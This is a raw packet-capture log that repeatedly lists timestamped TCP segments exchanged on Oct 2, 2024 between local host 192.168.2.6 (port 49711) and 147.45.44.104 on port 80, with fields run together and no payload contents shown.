                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.319788933 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322258949 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322287083 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322298050 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322323084 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322374105 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322386026 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322417021 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322460890 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322472095 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322482109 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322505951 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322529078 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322608948 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322623014 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322647095 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322659969 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322727919 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322738886 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322753906 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322760105 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322782040 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322864056 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322901011 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.322992086 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323003054 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323014975 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323025942 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323035955 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323036909 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323052883 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323062897 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323080063 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323246002 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323257923 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323276997 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323282003 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323286057 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323296070 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323306084 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323316097 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323326111 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323326111 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323339939 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323357105 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323359013 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323369980 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323400974 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323573112 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323584080 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323595047 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323617935 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323779106 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323790073 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323806047 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323813915 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323816061 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323826075 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323836088 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323839903 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323847055 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323857069 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323863983 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323867083 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323877096 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323888063 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323893070 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323898077 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323909044 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323910952 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323925972 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.323944092 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324208021 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324218988 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324253082 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324335098 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324346066 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324356079 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324367046 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324377060 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324378014 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324388027 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324398041 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324400902 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324409008 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324419022 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324420929 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324429989 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324449062 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324466944 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324832916 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324852943 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324861050 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324862003 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324865103 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324870110 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324876070 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324882984 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324893951 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324894905 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324901104 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324909925 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324915886 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324920893 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324923038 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324937105 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.324959993 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325208902 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325221062 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325232029 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325243950 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325261116 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325417042 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325433969 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325444937 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325455904 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325469017 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325475931 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325479031 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325489044 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325500011 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325501919 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325510025 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325517893 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325520992 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325532913 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325535059 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325556040 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325579882 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325582027 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325587988 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325599909 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325611115 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325612068 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325620890 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325638056 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.325654984 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326322079 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326333046 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326344013 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326354980 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326364040 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326374054 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326381922 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326385021 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326395035 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326395035 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326405048 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326416969 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326427937 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326427937 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326437950 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326447964 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326447964 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326458931 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326463938 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326469898 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326479912 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326483011 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326491117 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326498985 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.326524973 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.356534958 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.356573105 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.356584072 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.356606960 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.356684923 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.356695890 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.356707096 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.356718063 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.356726885 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.356755018 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.412976980 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413011074 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413021088 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413053989 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413055897 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413067102 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413079977 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413094044 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413132906 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413132906 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413181067 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413212061 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413322926 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413332939 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413343906 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413352966 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413363934 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413397074 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413413048 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413531065 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413542032 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413556099 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413566113 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413573980 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413575888 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413585901 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413597107 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413600922 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413631916 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413762093 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413772106 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413783073 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413795948 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413813114 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413836956 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413904905 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413914919 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413925886 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413935900 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413944960 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413954020 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.413980961 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414071083 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414082050 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414094925 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414104939 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414118052 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414136887 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414292097 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414302111 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414314985 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414324999 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414335012 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414335012 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414350033 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414350986 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414361954 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414371014 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414380074 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414381981 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414391041 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414401054 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414407015 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414411068 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414421082 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414424896 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414432049 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414442062 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414443016 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414458990 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414458990 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414477110 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414788961 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414799929 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414809942 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414820910 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414829969 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414830923 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414844990 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414865971 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.414992094 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415003061 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415011883 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415021896 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415030956 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415041924 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415051937 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415055990 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415061951 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415067911 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415071964 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415082932 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415093899 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415095091 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.415105104 CEST8049711147.45.44.104192.168.2.6
